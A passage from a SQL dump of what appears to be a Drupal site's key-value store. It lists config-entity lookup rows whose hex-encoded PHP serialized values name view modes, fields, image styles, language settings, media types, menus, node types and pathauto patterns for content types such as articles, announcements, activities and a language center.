('config.entity.key_store.entity_view_mode', 'uuid:5b017297-ead4-442c-a42b-3d0d492305a8', 0x613a313a7b693a303b733a33303a22636f72652e656e746974795f766965775f6d6f64652e6e6f64652e727373223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:6fc74603-3617-4b96-a50d-5e2f84e629e5', 0x613a313a7b693a303b733a34313a22636f72652e656e746974795f766965775f6d6f64652e7461786f6e6f6d795f7465726d2e746f6b656e223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:72146859-620f-4cb3-bd2d-66b2cf7d7e87', 0x613a313a7b693a303b733a33393a22636f72652e656e746974795f766965775f6d6f64652e6e6f64652e7365617263685f696e646578223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:72d39742-f6bc-4b26-98ef-873c7842f908', 0x613a313a7b693a303b733a33313a22636f72652e656e746974795f766965775f6d6f64652e6e6f64652e66756c6c223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:758dd9fe-b7a6-4f2d-8927-b415d43fe9a9', 0x613a313a7b693a303b733a33313a22636f72652e656e746974795f766965775f6d6f64652e757365722e66756c6c223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:7aa33b29-0eac-459c-8f68-9dffee78bb47', 0x613a313a7b693a303b733a33323a22636f72652e656e746974795f766965775f6d6f64652e757365722e746f6b656e223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:85caf5f9-8842-425a-9340-34d13beb7cc2', 0x613a313a7b693a303b733a33323a22636f72652e656e746974795f766965775f6d6f64652e6e6f64652e746f6b656e223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:8a689f02-439e-4bf3-845a-017d222c79fc', 0x613a313a7b693a303b733a33343a22636f72652e656e746974795f766965775f6d6f64652e757365722e636f6d70616374223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:a53ebf60-e922-46d8-a060-4b9039a596c8', 0x613a313a7b693a303b733a33343a22636f72652e656e746974795f766965775f6d6f64652e636f6d6d656e742e66756c6c223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:b5516cf6-d9da-4cf1-bf5a-ea054b4e1df5', 0x613a313a7b693a303b733a33333a22636f72652e656e746974795f766965775f6d6f64652e6e6f64652e746561736572223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:d34b846d-d4b7-425f-9acd-f74855a8ca85', 0x613a313a7b693a303b733a33323a22636f72652e656e746974795f766965775f6d6f64652e746f75722e746f6b656e223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:d85f3484-0218-4b18-a945-7aa7fbceb900', 0x613a313a7b693a303b733a33323a22636f72652e656e746974795f766965775f6d6f64652e66696c652e746f6b656e223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:dbcce057-31e6-41d8-bd65-128945e04295', 0x613a313a7b693a303b733a34313a22636f72652e656e746974795f766965775f6d6f64652e6d656469612e6d656469615f6c696272617279223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:e03f5480-91c0-4c93-8145-7bffdc16ae1c', 0x613a313a7b693a303b733a33353a22636f72652e656e746974795f766965775f6d6f64652e636f6d6d656e742e746f6b656e223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:e38b58e8-33b0-4726-851f-2747653aec30', 0x613a313a7b693a303b733a33323a22636f72652e656e746974795f766965775f6d6f64652e6d656469612e66756c6c223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:ec0fd0c6-79c5-4fa5-b44c-f1f17ac1c8dd', 0x613a313a7b693a303b733a34303a22636f72652e656e746974795f766965775f6d6f64652e626c6f636b5f636f6e74656e742e66756c6c223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:f0e8b14e-7aa6-440c-b708-fc7f6d6b55fd', 0x613a313a7b693a303b733a34333a22636f72652e656e746974795f766965775f6d6f64652e636f6e746163745f6d6573736167652e746f6b656e223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:f9a6c7af-8ae4-417c-b457-eb624f99f5ba', 0x613a313a7b693a303b733a34303a22636f72652e656e746974795f766965775f6d6f64652e6e6f64652e7365617263685f726573756c74223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:fc24beee-212d-40f8-8455-a1b825507d16', 0x613a313a7b693a303b733a34303a22636f72652e656e746974795f766965775f6d6f64652e7461786f6e6f6d795f7465726d2e66756c6c223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:fdfb8ad0-6b1f-4da0-a910-99f01e773ba2', 0x613a313a7b693a303b733a33333a22636f72652e656e746974795f766965775f6d6f64652e626c6f636b2e746f6b656e223b7d),
('config.entity.key_store.field_config', 'uuid:0074ced7-3069-4e84-8dcc-e1103a5600ed', 0x613a313a7b693a303b733a33363a226669656c642e6669656c642e626c6f636b5f636f6e74656e742e62617369632e626f6479223b7d),
('config.entity.key_store.field_config', 'uuid:0162bcc7-f961-4331-b686-02d285967c6a', 0x613a313a7b693a303b733a34393a226669656c642e6669656c642e6e6f64652e6c616e67756167655f63656e7465722e6669656c645f63656e7465725f696d67223b7d),
('config.entity.key_store.field_config', 'uuid:06f5f940-0a68-4be2-9e71-f951b9606089', 0x613a313a7b693a303b733a35393a226669656c642e6669656c642e6e6f64652e6c616e67756167655f63656e7465722e6669656c645f63656e7465725f646f776e6c6f61645f66696c65223b7d),
('config.entity.key_store.field_config', 'uuid:09d2b52f-e0a9-4c4e-9c46-1393d5a6f848', 0x613a313a7b693a303b733a34373a226669656c642e6669656c642e6d656469612e646f63756d656e742e6669656c645f6d656469615f646f63756d656e74223b7d),
('config.entity.key_store.field_config', 'uuid:0b5203b7-4214-40b6-9db5-0ae189aae7a1', 0x613a313a7b693a303b733a35373a226669656c642e6669656c642e6e6f64652e6c616e67756167655f63656e7465722e6669656c645f63656e7465725f6465736372697074696f6e223b7d),
('config.entity.key_store.field_config', 'uuid:0b8bd225-c716-4ee1-ada1-e46c21ad1adc', 0x613a313a7b693a303b733a34363a226669656c642e6669656c642e6d656469612e617564696f2e6669656c645f6d656469615f617564696f5f66696c65223b7d),
('config.entity.key_store.field_config', 'uuid:12c0634f-b9fc-4b47-9019-d0c00c724c58', 0x613a313a7b693a303b733a33323a226669656c642e6669656c642e6e6f64652e616374697669746965732e626f6479223b7d),
('config.entity.key_store.field_config', 'uuid:209086c0-28a1-4ab1-a42d-abe19dbf2b88', 0x613a313a7b693a303b733a35353a226669656c642e6669656c642e6d656469612e72656d6f74655f766964656f2e6669656c645f6d656469615f6f656d6265645f766964656f223b7d),
('config.entity.key_store.field_config', 'uuid:21f055d1-1373-4822-90b5-a91c38e50561', 0x613a313a7b693a303b733a33323a226669656c642e6669656c642e6e6f64652e61727469636c652e636f6d6d656e74223b7d),
('config.entity.key_store.field_config', 'uuid:24cd26fd-2c2f-4637-8cf1-f55299c3e739', 0x613a313a7b693a303b733a33373a226669656c642e6669656c642e6e6f64652e6c616e67756167655f63656e7465722e626f6479223b7d),
('config.entity.key_store.field_config', 'uuid:33391453-1294-4039-a156-994dd81e25fc', 0x613a313a7b693a303b733a35383a226669656c642e6669656c642e6e6f64652e616374697669746965732e6669656c645f616374697669746965735f646f776e6c6f61645f66696c65223b7d),
('config.entity.key_store.field_config', 'uuid:4e080fa7-8fe2-4734-97de-8dba65186d11', 0x613a313a7b693a303b733a34303a226669656c642e6669656c642e6e6f64652e736c696465722e6669656c645f736c696465725f696d67223b7d),
('config.entity.key_store.field_config', 'uuid:60e696b9-aefb-47e8-9059-9ba5ae883f27', 0x613a313a7b693a303b733a34303a226669656c642e6669656c642e636f6d6d656e742e636f6d6d656e742e636f6d6d656e745f626f6479223b7d),
('config.entity.key_store.field_config', 'uuid:8330e84d-b86d-452f-8304-2602ef566d2c', 0x613a313a7b693a303b733a33343a226669656c642e6669656c642e757365722e757365722e757365725f70696374757265223b7d),
('config.entity.key_store.field_config', 'uuid:84fa6f46-c82f-4871-8b5d-92b907451528', 0x613a313a7b693a303b733a35343a226669656c642e6669656c642e6e6f64652e616374697669746965732e6669656c645f616374697669746965735f706f73745f64617465223b7d),
('config.entity.key_store.field_config', 'uuid:88ca7a47-cc20-46f1-abed-e0e2f2a919e2', 0x613a313a7b693a303b733a35343a226669656c642e6669656c642e6e6f64652e616e6e6f756e63656d656e742e6669656c645f616e6e6f756e63655f706f73745f64617465223b7d),
('config.entity.key_store.field_config', 'uuid:89786c61-2d2c-4054-a69c-e83e585660db', 0x613a313a7b693a303b733a32383a226669656c642e6669656c642e6e6f64652e736c696465722e626f6479223b7d),
('config.entity.key_store.field_config', 'uuid:9332b32c-acfd-46b5-93f7-179a993d7066', 0x613a313a7b693a303b733a34363a226669656c642e6669656c642e6d656469612e766964656f2e6669656c645f6d656469615f766964656f5f66696c65223b7d),
('config.entity.key_store.field_config', 'uuid:9e7ba1b1-80e4-44c1-ae4c-55b89bef9fb5', 0x613a313a7b693a303b733a34383a226669656c642e6669656c642e6e6f64652e616374697669746965732e6669656c645f616374697669746965735f696d67223b7d),
('config.entity.key_store.field_config', 'uuid:b06567e1-7ae4-41d1-83b8-2027aca99a0b', 0x613a313a7b693a303b733a34373a226669656c642e6669656c642e6e6f64652e616e6e6f756e63656d656e742e6669656c645f6465736372697074696f6e223b7d),
('config.entity.key_store.field_config', 'uuid:bbf5bc4e-f659-4c74-b4a2-7ed767a67aca', 0x613a313a7b693a303b733a35363a226669656c642e6669656c642e6e6f64652e616374697669746965732e6669656c645f616374697669746965735f6465736372697074696f6e223b7d),
('config.entity.key_store.field_config', 'uuid:bd426711-e799-4dd3-be46-6566b49318ff', 0x613a313a7b693a303b733a34393a226669656c642e6669656c642e6e6f64652e616e6e6f756e63656d656e742e6669656c645f646f776e6c6f61645f66696c65223b7d),
('config.entity.key_store.field_config', 'uuid:cafb8860-b6ea-4580-88cb-843f89b919b1', 0x613a313a7b693a303b733a35353a226669656c642e6669656c642e6e6f64652e6c616e67756167655f63656e7465722e6669656c645f63656e7465725f706f73745f64617465223b7d),
('config.entity.key_store.field_config', 'uuid:df792b93-661d-4e12-aa97-d38860b4d3ac', 0x613a313a7b693a303b733a32393a226669656c642e6669656c642e6e6f64652e61727469636c652e626f6479223b7d),
('config.entity.key_store.field_config', 'uuid:e8caeb74-fb58-46a3-9c65-16dcbe5ccb59', 0x613a313a7b693a303b733a33363a226669656c642e6669656c642e6e6f64652e61727469636c652e6669656c645f696d616765223b7d),
('config.entity.key_store.field_config', 'uuid:eff029a6-da9f-44b6-a3d7-e3a63e2e4412', 0x613a313a7b693a303b733a33353a226669656c642e6669656c642e6e6f64652e61727469636c652e6669656c645f74616773223b7d),
('config.entity.key_store.field_config', 'uuid:f2450474-6d9c-44b6-b0ee-9a46141845e9', 0x613a313a7b693a303b733a32363a226669656c642e6669656c642e6e6f64652e706167652e626f6479223b7d),
('config.entity.key_store.field_config', 'uuid:f8e187fa-ef30-472a-a870-c1ae87ffe79c', 0x613a313a7b693a303b733a34313a226669656c642e6669656c642e6d656469612e696d6167652e6669656c645f6d656469615f696d616765223b7d),
('config.entity.key_store.field_config', 'uuid:f9dc328c-766a-43c4-87bb-93d290a1c81c', 0x613a313a7b693a303b733a33343a226669656c642e6669656c642e6e6f64652e616e6e6f756e63656d656e742e626f6479223b7d),
('config.entity.key_store.field_storage_config', 'uuid:01d1def7-f5ec-43e8-a533-5c0d23928fec', 0x613a313a7b693a303b733a33313a226669656c642e73746f726167652e757365722e757365725f70696374757265223b7d),
('config.entity.key_store.field_storage_config', 'uuid:12e712bd-b7a7-4d36-87ba-23a1f492b9f9', 0x613a313a7b693a303b733a34353a226669656c642e73746f726167652e6e6f64652e6669656c645f616374697669746965735f706f73745f64617465223b7d),
('config.entity.key_store.field_storage_config', 'uuid:1fc4e370-40bf-465d-bf9d-55155549ded6', 0x613a313a7b693a303b733a32363a226669656c642e73746f726167652e6e6f64652e636f6d6d656e74223b7d),
('config.entity.key_store.field_storage_config', 'uuid:2a5176e2-8979-4f68-96ac-0bc0c98ef4e9', 0x613a313a7b693a303b733a34393a226669656c642e73746f726167652e6e6f64652e6669656c645f616374697669746965735f646f776e6c6f61645f66696c65223b7d),
('config.entity.key_store.field_storage_config', 'uuid:4e493942-285f-483a-ac12-a6735f1bd4a1', 0x613a313a7b693a303b733a32333a226669656c642e73746f726167652e6e6f64652e626f6479223b7d),
('config.entity.key_store.field_storage_config', 'uuid:6e19ce84-c163-4c31-8b3b-266226171a4e', 0x613a313a7b693a303b733a34373a226669656c642e73746f726167652e6e6f64652e6669656c645f616374697669746965735f6465736372697074696f6e223b7d),
('config.entity.key_store.field_storage_config', 'uuid:6edd318c-7790-4ac4-a130-ef391383aa50', 0x613a313a7b693a303b733a34333a226669656c642e73746f726167652e6e6f64652e6669656c645f63656e7465725f6465736372697074696f6e223b7d),
('config.entity.key_store.field_storage_config', 'uuid:7e7543e7-5b3b-4cb7-bf2d-9daaa940e647', 0x613a313a7b693a303b733a33363a226669656c642e73746f726167652e6e6f64652e6669656c645f6465736372697074696f6e223b7d),
('config.entity.key_store.field_storage_config', 'uuid:88380ca4-3786-4748-b4d6-47f10be07b42', 0x613a313a7b693a303b733a32393a226669656c642e73746f726167652e6e6f64652e6669656c645f74616773223b7d),
('config.entity.key_store.field_storage_config', 'uuid:90635672-f6a3-40ce-9c55-752f22719292', 0x613a313a7b693a303b733a33303a226669656c642e73746f726167652e6e6f64652e6669656c645f696d616765223b7d),
('config.entity.key_store.field_storage_config', 'uuid:9179e700-3b00-4de3-9039-feaddc1ab15b', 0x613a313a7b693a303b733a34323a226669656c642e73746f726167652e6d656469612e6669656c645f6d656469615f617564696f5f66696c65223b7d),
('config.entity.key_store.field_storage_config', 'uuid:a1204523-7afb-43a1-8a3a-808f185fafe7', 0x613a313a7b693a303b733a33393a226669656c642e73746f726167652e6e6f64652e6669656c645f616374697669746965735f696d67223b7d),
('config.entity.key_store.field_storage_config', 'uuid:b48ab48d-ca66-4982-b8f9-a5a6e43befb5', 0x613a313a7b693a303b733a34313a226669656c642e73746f726167652e6e6f64652e6669656c645f63656e7465725f706f73745f64617465223b7d),
('config.entity.key_store.field_storage_config', 'uuid:c1afc402-6fd6-4c9a-b95f-601ace5f4643', 0x613a313a7b693a303b733a34303a226669656c642e73746f726167652e6d656469612e6669656c645f6d656469615f646f63756d656e74223b7d),
('config.entity.key_store.field_storage_config', 'uuid:c2018e10-7dac-4831-9aed-a4beaeb20e3b', 0x613a313a7b693a303b733a34333a226669656c642e73746f726167652e6e6f64652e6669656c645f616e6e6f756e63655f706f73745f64617465223b7d),
('config.entity.key_store.field_storage_config', 'uuid:cbb0d64b-5c56-4634-b64f-24ba41efbf6b', 0x613a313a7b693a303b733a33353a226669656c642e73746f726167652e6e6f64652e6669656c645f736c696465725f696d67223b7d),
('config.entity.key_store.field_storage_config', 'uuid:cdfc6c12-25fe-4fee-983e-b9f5191f3055', 0x613a313a7b693a303b733a34353a226669656c642e73746f726167652e6e6f64652e6669656c645f63656e7465725f646f776e6c6f61645f66696c65223b7d),
('config.entity.key_store.field_storage_config', 'uuid:ce0f8b08-1228-482b-95c4-3bb69c2e21bc', 0x613a313a7b693a303b733a33383a226669656c642e73746f726167652e6e6f64652e6669656c645f646f776e6c6f61645f66696c65223b7d),
('config.entity.key_store.field_storage_config', 'uuid:d262d9d7-a3bc-4c63-9ca0-e435fe03b425', 0x613a313a7b693a303b733a33323a226669656c642e73746f726167652e626c6f636b5f636f6e74656e742e626f6479223b7d),
('config.entity.key_store.field_storage_config', 'uuid:dd093e56-0fad-4bcb-b617-5828bdc5c4d2', 0x613a313a7b693a303b733a34343a226669656c642e73746f726167652e6d656469612e6669656c645f6d656469615f6f656d6265645f766964656f223b7d),
('config.entity.key_store.field_storage_config', 'uuid:f3e11745-608a-4c1c-9cb1-2a1a2f5221b7', 0x613a313a7b693a303b733a33343a226669656c642e73746f726167652e636f6d6d656e742e636f6d6d656e745f626f6479223b7d),
('config.entity.key_store.field_storage_config', 'uuid:f730007a-ee88-4bff-a84b-460318616568', 0x613a313a7b693a303b733a33353a226669656c642e73746f726167652e6e6f64652e6669656c645f63656e7465725f696d67223b7d),
('config.entity.key_store.field_storage_config', 'uuid:fb277a6e-dc9b-43ad-b797-8badb79b68b0', 0x613a313a7b693a303b733a33373a226669656c642e73746f726167652e6d656469612e6669656c645f6d656469615f696d616765223b7d),
('config.entity.key_store.field_storage_config', 'uuid:fd5a1a36-eb21-4e51-9700-1f9cd8897964', 0x613a313a7b693a303b733a34323a226669656c642e73746f726167652e6d656469612e6669656c645f6d656469615f766964656f5f66696c65223b7d),
('config.entity.key_store.filter_format', 'uuid:1cb1124b-32f9-4b57-8c1b-6562405909df', 0x613a313a7b693a303b733a32343a2266696c7465722e666f726d61742e62617369635f68746d6c223b7d),
('config.entity.key_store.filter_format', 'uuid:6f19f7da-924a-45ec-a439-8a659ce5b123', 0x613a313a7b693a303b733a32393a2266696c7465722e666f726d61742e726573747269637465645f68746d6c223b7d),
('config.entity.key_store.filter_format', 'uuid:d23f92ed-b6f7-417b-bdb7-0c83118c0d8b', 0x613a313a7b693a303b733a32343a2266696c7465722e666f726d61742e706c61696e5f74657874223b7d),
('config.entity.key_store.filter_format', 'uuid:ebaa7220-e48e-4951-9273-02635b157216', 0x613a313a7b693a303b733a32333a2266696c7465722e666f726d61742e66756c6c5f68746d6c223b7d),
('config.entity.key_store.image_style', 'uuid:16ac37ac-f190-4913-bd73-a853218618ed', 0x613a313a7b693a303b733a32313a22696d6167652e7374796c652e61626f75745f696d67223b7d),
('config.entity.key_store.image_style', 'uuid:3e53b198-a063-4e77-8a03-c699112db575', 0x613a313a7b693a303b733a32323a22696d6167652e7374796c652e736c696465725f696d67223b7d),
('config.entity.key_store.image_style', 'uuid:4f52d571-30b0-40f2-933f-c5a4995a3130', 0x613a313a7b693a303b733a32353a22696d6167652e7374796c652e6d656469615f6c696272617279223b7d),
('config.entity.key_store.image_style', 'uuid:5e2128e2-4551-42c7-a8ca-cbb567f8ae58', 0x613a313a7b693a303b733a31363a22696d6167652e7374796c652e77696465223b7d),
('config.entity.key_store.image_style', 'uuid:91d896e3-69f3-48a9-9c70-98d612178062', 0x613a313a7b693a303b733a31373a22696d6167652e7374796c652e6c61726765223b7d),
('config.entity.key_store.image_style', 'uuid:991c31b1-a457-4361-bb77-39f1b884b95b', 0x613a313a7b693a303b733a31383a22696d6167652e7374796c652e6d656469756d223b7d),
('config.entity.key_store.image_style', 'uuid:a1e86237-e856-468e-9a78-7d96de834617', 0x613a313a7b693a303b733a32343a22696d6167652e7374796c652e616e6e6f756e63655f696d67223b7d),
('config.entity.key_store.image_style', 'uuid:c3044de3-5f44-49a7-a738-349b9c5419b5', 0x613a313a7b693a303b733a32313a22696d6167652e7374796c652e7468756d626e61696c223b7d),
('config.entity.key_store.language_content_settings', 'uuid:007b5e69-3319-42fd-9e5a-47cd14d08657', 0x613a313a7b693a303b733a33353a226c616e67756167652e636f6e74656e745f73657474696e67732e66696c652e66696c65223b7d),
('config.entity.key_store.language_content_settings', 'uuid:0aef5463-c1e7-4459-aac6-f1851efc62af', 0x613a313a7b693a303b733a34343a226c616e67756167652e636f6e74656e745f73657474696e67732e6d656469612e72656d6f74655f766964656f223b7d),
('config.entity.key_store.language_content_settings', 'uuid:0ff2b1db-667c-4e4f-8765-afaa89c2b3b4', 0x613a313a7b693a303b733a33353a226c616e67756167652e636f6e74656e745f73657474696e67732e757365722e75736572223b7d),
('config.entity.key_store.language_content_settings', 'uuid:18f03590-4694-44cb-a3ca-77730d7c18b9', 0x613a313a7b693a303b733a33373a226c616e67756167652e636f6e74656e745f73657474696e67732e6d656469612e617564696f223b7d),
('config.entity.key_store.language_content_settings', 'uuid:1af047f5-4054-4b4a-b39f-219b9fe5c139', 0x613a313a7b693a303b733a33383a226c616e67756167652e636f6e74656e745f73657474696e67732e6e6f64652e61727469636c65223b7d),
('config.entity.key_store.language_content_settings', 'uuid:2e49e620-f2f5-46a4-bd2d-431126da32d2', 0x613a313a7b693a303b733a36313a226c616e67756167652e636f6e74656e745f73657474696e67732e6d656e755f6c696e6b5f636f6e74656e742e6d656e755f6c696e6b5f636f6e74656e74223b7d),
('config.entity.key_store.language_content_settings', 'uuid:36c589ef-e24d-4418-bfd7-2ed1725c68f2', 0x613a313a7b693a303b733a34353a226c616e67756167652e636f6e74656e745f73657474696e67732e626c6f636b5f636f6e74656e742e6261736963223b7d),
('config.entity.key_store.language_content_settings', 'uuid:714efbf3-7881-4362-ae62-8a6c16bc67db', 0x613a313a7b693a303b733a34343a226c616e67756167652e636f6e74656e745f73657474696e67732e7461786f6e6f6d795f7465726d2e74616773223b7d),
('config.entity.key_store.language_content_settings', 'uuid:72cc033b-e432-4dff-b5db-23a1466d20d0', 0x613a313a7b693a303b733a34333a226c616e67756167652e636f6e74656e745f73657474696e67732e6e6f64652e616e6e6f756e63656d656e74223b7d),
('config.entity.key_store.language_content_settings', 'uuid:8c51653d-9a44-4fe1-a6c5-657c1d45e76d', 0x613a313a7b693a303b733a33373a226c616e67756167652e636f6e74656e745f73657474696e67732e6e6f64652e736c69646572223b7d),
('config.entity.key_store.language_content_settings', 'uuid:9cad8462-0257-4016-b986-6a2056e1c676', 0x613a313a7b693a303b733a35303a226c616e67756167652e636f6e74656e745f73657474696e67732e636f6e746163745f6d6573736167652e706572736f6e616c223b7d),
('config.entity.key_store.language_content_settings', 'uuid:a9c85378-a26c-4a67-a162-dbdafff25fda', 0x613a313a7b693a303b733a33353a226c616e67756167652e636f6e74656e745f73657474696e67732e6e6f64652e70616765223b7d),
('config.entity.key_store.language_content_settings', 'uuid:c6db9adb-4bd5-4901-b6f3-234b209ef90b', 0x613a313a7b693a303b733a33373a226c616e67756167652e636f6e74656e745f73657474696e67732e6d656469612e766964656f223b7d),
('config.entity.key_store.language_content_settings', 'uuid:ccb68534-fee1-4882-972b-fb572171a7d9', 0x613a313a7b693a303b733a34363a226c616e67756167652e636f6e74656e745f73657474696e67732e6e6f64652e6c616e67756167655f63656e746572223b7d),
('config.entity.key_store.language_content_settings', 'uuid:cf467aae-72a5-40e4-b7d8-f0d24b295210', 0x613a313a7b693a303b733a34313a226c616e67756167652e636f6e74656e745f73657474696e67732e6e6f64652e61637469766974696573223b7d),
('config.entity.key_store.language_content_settings', 'uuid:cfae25a8-f399-409f-891e-803810e3299d', 0x613a313a7b693a303b733a34303a226c616e67756167652e636f6e74656e745f73657474696e67732e6d656469612e646f63756d656e74223b7d),
('config.entity.key_store.language_content_settings', 'uuid:def69336-a404-4212-b15c-5c4c84ea2f75', 0x613a313a7b693a303b733a35303a226c616e67756167652e636f6e74656e745f73657474696e67732e636f6e746163745f6d6573736167652e666565646261636b223b7d),
('config.entity.key_store.language_content_settings', 'uuid:e72e8eaf-1622-43b9-b18e-382b309490b9', 0x613a313a7b693a303b733a34323a226c616e67756167652e636f6e74656e745f73657474696e67732e73686f72746375742e64656661756c74223b7d),
('config.entity.key_store.language_content_settings', 'uuid:e9d30503-ed96-4b70-82c4-ccfe5de61cae', 0x613a313a7b693a303b733a34313a226c616e67756167652e636f6e74656e745f73657474696e67732e636f6d6d656e742e636f6d6d656e74223b7d),
('config.entity.key_store.language_content_settings', 'uuid:f326c285-ca7a-4ef1-a589-5fc11168fc9e', 0x613a313a7b693a303b733a33373a226c616e67756167652e636f6e74656e745f73657474696e67732e6d656469612e696d616765223b7d),
('config.entity.key_store.language_content_settings', 'uuid:f6c0598d-f8f8-479a-b40f-e3609d602ad6', 0x613a313a7b693a303b733a34373a226c616e67756167652e636f6e74656e745f73657474696e67732e706174685f616c6961732e706174685f616c696173223b7d),
('config.entity.key_store.media_type', 'uuid:5eca17d5-fcec-4350-9eef-9718ca89eedf', 0x613a313a7b693a303b733a31393a226d656469612e747970652e646f63756d656e74223b7d),
('config.entity.key_store.media_type', 'uuid:7319d92a-c595-4462-a5bb-b03e7cbbb7bf', 0x613a313a7b693a303b733a32333a226d656469612e747970652e72656d6f74655f766964656f223b7d),
('config.entity.key_store.media_type', 'uuid:ab4acd3f-513b-4ff9-962b-ec2da7b315d2', 0x613a313a7b693a303b733a31363a226d656469612e747970652e696d616765223b7d),
('config.entity.key_store.media_type', 'uuid:bf22b9c7-edc2-4910-ba16-ef074f2941ed', 0x613a313a7b693a303b733a31363a226d656469612e747970652e617564696f223b7d),
('config.entity.key_store.media_type', 'uuid:eebca018-5670-4f42-8f1c-069161656668', 0x613a313a7b693a303b733a31363a226d656469612e747970652e766964656f223b7d),
('config.entity.key_store.menu', 'uuid:2e43e32e-c05c-4943-b49e-bda41b256f3a', 0x613a313a7b693a303b733a32313a2273797374656d2e6d656e752e6d61696e2d6d656e75223b7d),
('config.entity.key_store.menu', 'uuid:60d861de-9056-4a12-a536-d1125d338644', 0x613a313a7b693a303b733a31373a2273797374656d2e6d656e752e61646d696e223b7d),
('config.entity.key_store.menu', 'uuid:b775f18e-e15c-45ee-ae76-7fbc52a57666', 0x613a313a7b693a303b733a31373a2273797374656d2e6d656e752e746f6f6c73223b7d),
('config.entity.key_store.menu', 'uuid:b85dbeac-b55e-4da5-a3c7-721cd6f100a6', 0x613a313a7b693a303b733a31393a2273797374656d2e6d656e752e6163636f756e74223b7d),
('config.entity.key_store.menu', 'uuid:e62aa541-0159-458a-a441-fd8d3eed45a1', 0x613a313a7b693a303b733a31383a2273797374656d2e6d656e752e666f6f746572223b7d),
('config.entity.key_store.menu', 'uuid:ff4b9e85-8ccb-4941-a4ae-13921d604fb1', 0x613a313a7b693a303b733a31363a2273797374656d2e6d656e752e6d61696e223b7d),
('config.entity.key_store.node_type', 'uuid:35c0003c-16e2-46c5-94af-2f492628d9a7', 0x613a313a7b693a303b733a32303a226e6f64652e747970652e61637469766974696573223b7d),
('config.entity.key_store.node_type', 'uuid:54afa997-78ec-4085-a262-e5f2ba9c53d9', 0x613a313a7b693a303b733a31373a226e6f64652e747970652e61727469636c65223b7d),
('config.entity.key_store.node_type', 'uuid:88b9adae-97bf-4c59-86ee-7b7899ae059c', 0x613a313a7b693a303b733a31343a226e6f64652e747970652e70616765223b7d),
('config.entity.key_store.node_type', 'uuid:8a45258a-58d8-4e6c-8fe7-044e891365c7', 0x613a313a7b693a303b733a31363a226e6f64652e747970652e736c69646572223b7d),
('config.entity.key_store.node_type', 'uuid:c66cdc7b-770c-460a-963f-a42247a12992', 0x613a313a7b693a303b733a32353a226e6f64652e747970652e6c616e67756167655f63656e746572223b7d),
('config.entity.key_store.node_type', 'uuid:db550e4f-d297-4429-a00d-e2d94ae61ea7', 0x613a313a7b693a303b733a32323a226e6f64652e747970652e616e6e6f756e63656d656e74223b7d),
('config.entity.key_store.pathauto_pattern', 'status:1', 0x613a343a7b693a303b733a33363a22706174686175746f2e7061747465726e2e636f6e74656e745f6e6f64655f7469746c655f223b693a313b733a34313a22706174686175746f2e7061747465726e2e616e6e6f756e63656d656e745f6e6f64655f7469746c655f223b693a323b733a33393a22706174686175746f2e7061747465726e2e616374697669746965735f6e6f64655f7469746c655f223b693a333b733a34333a22706174686175746f2e7061747465726e2e6c616e67756167655f63656e7465725f6e6f64655f7469746c65223b7d),
('config.entity.key_store.pathauto_pattern', 'type:canonical_entities:node', 0x613a343a7b693a303b733a33363a22706174686175746f2e7061747465726e2e636f6e74656e745f6e6f64655f7469746c655f223b693a313b733a34313a22706174686175746f2e7061747465726e2e616e6e6f756e63656d656e745f6e6f64655f7469746c655f223b693a323b733a33393a22706174686175746f2e7061747465726e2e616374697669746965735f6e6f64655f7469746c655f223b693a333b733a34333a22706174686175746f2e7061747465726e2e6c616e67756167655f63656e7465725f6e6f64655f7469746c65223b7d),
('config.entity.key_store.pathauto_pattern', 'uuid:1d09dc9b-8dba-45f6-b627-52f2494aab50', 0x613a313a7b693a303b733a34313a22706174686175746f2e7061747465726e2e616e6e6f756e63656d656e745f6e6f64655f7469746c655f223b7d),
('config.entity.key_store.pathauto_pattern', 'uuid:52dfdb4e-7929-495b-aba7-8223dc3e025f', 0x613a313a7b693a303b733a33393a22706174686175746f2e7061747465726e2e616374697669746965735f6e6f64655f7469746c655f223b7d),
('config.entity.key_store.pathauto_pattern', 'uuid:95f4e552-3061-43c8-933d-9d3319df239e', 0x613a313a7b693a303b733a34333a22706174686175746f2e7061747465726e2e6c616e67756167655f63656e7465725f6e6f64655f7469746c65223b7d),
('config.entity.key_store.pathauto_pattern', 'uuid:d6ebe625-8442-4295-9ad4-d66b491dcf10', 0x613a313a7b693a303b733a33363a22706174686175746f2e7061747465726e2e636f6e74656e745f6e6f64655f7469746c655f223b7d),
('config.entity.key_store.search_page', 'uuid:2820bb7b-7d44-4ea1-bea1-fafe64d709d0', 0x613a313a7b693a303b733a32333a227365617263682e706167652e6e6f64655f736561726368223b7d),
('config.entity.key_store.search_page', 'uuid:7c15e346-9769-41ae-a629-0afa14272220', 0x613a313a7b693a303b733a32333a227365617263682e706167652e757365725f736561726368223b7d),
('config.entity.key_store.shortcut_set', 'uuid:15cd1f3d-35dc-40eb-b8ed-fcc324c3ae71', 0x613a313a7b693a303b733a32303a2273686f72746375742e7365742e64656661756c74223b7d),
('config.entity.key_store.taxonomy_vocabulary', 'uuid:5b361625-63fb-4d39-9e19-28cd868c5b44', 0x613a313a7b693a303b733a32343a227461786f6e6f6d792e766f636162756c6172792e74616773223b7d),
('config.entity.key_store.tour', 'routes.*.route_name:block.admin_display', 0x613a313a7b693a303b733a32323a22746f75722e746f75722e626c6f636b2d6c61796f7574223b7d),
('config.entity.key_store.tour', 'routes.*.route_name:entity.configurable_language.collection', 0x613a313a7b693a303b733a31383a22746f75722e746f75722e6c616e6775616765223b7d),
('config.entity.key_store.tour', 'routes.*.route_name:entity.configurable_language.edit_form', 0x613a313a7b693a303b733a32333a22746f75722e746f75722e6c616e67756167652d65646974223b7d),
